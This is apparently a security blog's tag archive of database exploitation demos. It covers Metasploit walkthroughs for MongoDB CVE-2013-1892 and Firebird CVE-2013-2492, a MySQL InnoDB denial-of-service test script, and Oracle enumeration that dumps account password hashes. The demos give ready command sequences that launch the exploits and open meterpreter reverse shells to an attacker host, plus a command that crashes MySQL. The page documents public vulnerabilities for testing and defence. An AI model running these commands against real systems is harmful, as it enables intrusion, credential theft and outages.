Tag Archives: Database

CVE-2013-1892 MongoDB nativeHelper.apply Remote Code Execution Metasploit Demo

Timeline :

Vulnerability discovered and reported to vendor by agix around 2013-03-01
Vulnerability publicly disclosed by agix the 2013-03-24
Metasploit PoC provided the 2013-03-27

PoC provided by :

agix

Reference(s) :

CVE-2013-1892
OSVDB-91632
BID-58695

Affected version(s) :

MongoDB 2.2.3 and previous

Tested on Ubuntu 10.04 x86 with :

MongoDB 2.2.3

Description :

This module exploits a the nativeHelper feature from spiderMonkey which allows to control execution by calling it with specially crafted arguments. This module has been tested successfully on MongoDB 2.2.3 on Ubuntu 10.04 and Debian Squeeze.

Commands :

use exploit/linux/misc/mongod_native_helper
set RHOST 192.168.178.53
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.178.36
exploit

sysinfo
getuid

CVE-2013-2492 Firebird Relational Database Vulnerability Metasploit Demo

Timeline :

Vulnerability discovered by Spencer McIntyre the 2013-01-31
Vulnerability reported to the vendor the 2013-03-05
Coordinate public release of the vulnerability the 2013-03-08
Metasploit PoC provided the 2013-03-08

PoC provided by :

Spencer McIntyre

Reference(s) :

CVE-2013-2492
CORE-4058

Affected version(s) :

Firebird versions 2.1.3-2.1.5 and 2.5.1-2.5.2

Tested on Windows XP Pro SP3 with :

FireBird 2.5.2.26539

Description :

This module exploits a vulnerability in Firebird SQL Server. A specially crafted packet can be sent which will overwrite a pointer allowing the attacker to control where data is read from. Shortly, following the controlled read, the pointer is called resulting in code execution. The vulnerability exists with a group number extracted from the CNCT information, which is sent by the client, and whose size is not properly checked. This module uses an existing call to memcpy, just prior to the vulnerable code, which allows a small amount of data to be written to the stack. A two-phases stackpivot allows to execute the ROP chain which ultimately is used to execute VirtualAlloc and bypass DEP.

Commands :

use exploit/windows/misc/fb_cnct_group
set RHOST 192.168.178.22
set TARGET 0
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.36
exploit

getuid
sysinfo

Oracle MySQL InnoDB Bugs 13510739 and 63775 DoS Demo

Timeline :

Public release of the vulnerabilities the 2012-03-21
Details of the vulnerability published by Oracle the 2012-04-10
PoC provided by Oracle the 2012-03-21 in the source code of 5.5.22 and 5.1.62

PoC provided by :

Oracle

Reference(s) :

SA48744
MySQL 5.5.22 release note
MySQL 5.1.62 release note
Eric Romang Pastebin

Affected version(s) :

MySQL Server 5.5.21 and previous versions
MySQL Server 5.1.61 and previous versions

Tested on Centos 5 with :

MySQL 5.5.21

Description :

Oracle has release, the 21 March, two new versions of MySQL, version 5.5.22 and 5.1.62. These versions have fix two bugs #13510739 and #63775 how are considered as security fixes. But no impact details of these bugs are provided and the bugs report are closed.
Unfortunately for Oracle the two new versions were shipped with a development script “mysql-test/suite/innodb/t/innodb_bug13510739.test” in order to test the fix of the vulnerabilities, a PoC provided by Oracle. The bugs cause a denial of service of MySQL “ON HANDLER READ NEXT AFTER DELETE RECORD“. All the details are available in the script or on the upper Pastebin link.

Commands :

mysql -u root -p database < innodb_bug13510739.test

Metasploit Oracle database enumeration (oraenum)

Metasploit provide one useful and additional Oracle database auxiliary module who will permit you to gather informations.

You can find all these auxiliary modules through the Metasploit search command.

To invoke this auxiliary module just type the following command :

This module will scan the Oracle database server to gather different informations :

  • Oracle version (select * from v$version)
  • All values from v$parameter (select name,value from v$parameter)
  • If database audit trail is enabled or not
  • If database sys operations audit is enabled or not
  • If SQL92 security restriction on SELECT is enabled or not
  • If link encryption for logins is enabled or not
  • Provide you the UTL directory access configuration
  • Provide you the audit log directory configuration
  • Provide you the current account lockout time from the password policy
  • Provide you the number of authorized failed logins value before an account is locked from the password policy
  • Provide you the password grace time value from the password policy
  • Provide you the password lifetime value from the password policy
  • Provide you the the number of times a password can be reused from the password policy
  • Provide you the maximun number of times a password needs to be changed before it can be reused from the password policy
  • Check if the password complexity is enabled or not
  • Provide you a list of all active accounts in format Username, Hash and Spare4
  • Provide you a list of all expired or locked accounts in format Username, Hash and Spare4
  • Provide you a list of all accounts with DBA privileges in format Username and Hash
  • Provide you a list of all accounts with ALTER, JAVA ADMIN, CREATE LIBRARY, CREATE ANY.
  • Check default password are setup on the database.